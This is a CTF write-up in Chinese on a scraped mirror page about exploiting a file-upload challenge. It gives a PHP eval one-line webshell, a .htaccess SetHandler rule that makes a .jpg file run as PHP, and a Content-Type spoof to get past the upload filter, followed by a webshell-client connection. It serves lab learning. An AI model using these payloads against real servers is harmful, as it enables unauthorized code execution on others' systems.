当前位置: 首页 > news >正文

环江住房和城乡建设部网站如何优化wordpress网站

环江住房和城乡建设部网站,如何优化wordpress网站,网站建设页面设计之后,德持建设集团有限公司网站题目环境#xff1a; 不难看出是一道文件上传漏洞 上传一句话木马文件burpsuite进行抓包?php eval($_POST[shell]);? 命名为PHP文件格式 Repeater进行重放 尝试了其它后缀进行绕过都没有成功 通过 application/x-php内容类型#xff0c;可以看出被识别出是PHP文件 不难看出是一道文件上传漏洞 上传一句话木马文件burpsuite进行抓包?php eval($_POST[shell]);? 命名为PHP文件格式 Repeater进行重放 尝试了其它后缀进行绕过都没有成功 通过 application/x-php内容类型可以看出被识别出是PHP文件猜测作者使用了htaccess文件更改了相关配置 了解.htaccess文件 概述来说htaccess文件是Apache服务器中的一个配置文件它负责相关目录下的网页配置。通过htaccess文件可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 注意这几个字“改变文件扩展名”后面会用到 尝试传入jpg文件一句话木马不变回显结果是否会有所不同 发现上传成功 访问上传的文件 图片加载失败 到这里猜想使用中国蚁剑是连接不成功的 不过咱们还是按照正常程序走一遍比较好 使用中国蚁剑进行连接 返回数据为空 到这里我们的一句话木马并没有被识别出来或者说并没有执行猜测被拦截 尝试上传更改后的.htaccess文件 上传.htaccess文件 FileMatch 1.jpg SetHandler application/x-httpd-php /FileMatch上传的一句话木马文件要和1.jpg文件名一模一样 可以把这段代码理解为将1.jpg文件内容当作PHP文件执行 发现被拦截了更改内容类型为image/jpeg进行绕过 更改Content-Type内容类型为:image/jpeg .htaccess文件上传成功 再次上传1.jpg的木马文件 上传成功 访问成功 尝试使用蚁剑进行连接 使用中国蚁剑进行连接得到flagflag{11711c03-702e-43ac-b1fe-fec6c5297260}
http://www.hkea.cn/news/14389257/

相关文章:

  • 网站设计 wordpress假网站备案
  • 手工做的网站上海房地产网站建设
  • 福田营销型网站建站推广外包新手如何搭建自己的网站
  • 什么平台可以推广佛山百度seo排名
  • 企业网站建设设计方案字体升级wordpress
  • 深圳网站优化服务知更鸟wordpress主题
  • 富源县住房和城乡建设局网站重庆泡笋制作
  • 网站建设基本流程备案杭州公司建设网站
  • 怀化网站开发iis网站目录在哪
  • 中国建设银行官网网站wordpress调整侧边栏的高度
  • 手机网站前端写法外贸建站应该怎么做
  • 北京网站建设新鸿微信号做网站的公司哪家有名
  • 深圳市住建设局网站首页威海城乡与住房建设部网站
  • 百度网站改版工具wordpress前端获取头像
  • php网站开发哪个培训学校好三亚app开发公司
  • 工信部企业网站认证大连工业大学本科招生信息网
  • 建设网站便宜ps个人网站首页怎么制作
  • 南宁快速建站模板广州注册公司最新流程
  • 网站与域名的区别企业网站模板 演示
  • 网店装修模板制作网站整站优化
  • 广元建设公司网站1688外贸网站
  • 怎么找需要做网站的客户兰州建设网站的网站
  • 阿里去可以做几个网站开发微信小程序商城
  • 模块网站和定制网站区别应用公园app在线平台
  • 网站平台方案设计建设银行手机外汇网站
  • 网站开发有什么技术要求专业的徐州网站开发
  • 创建网站的向导和模板石家庄哪里有做网站
  • 网站呢建设随州网站建设有限公司
  • opencart网站wordpress 输入 摘要
  • 网站更改空间品牌型网站建设特点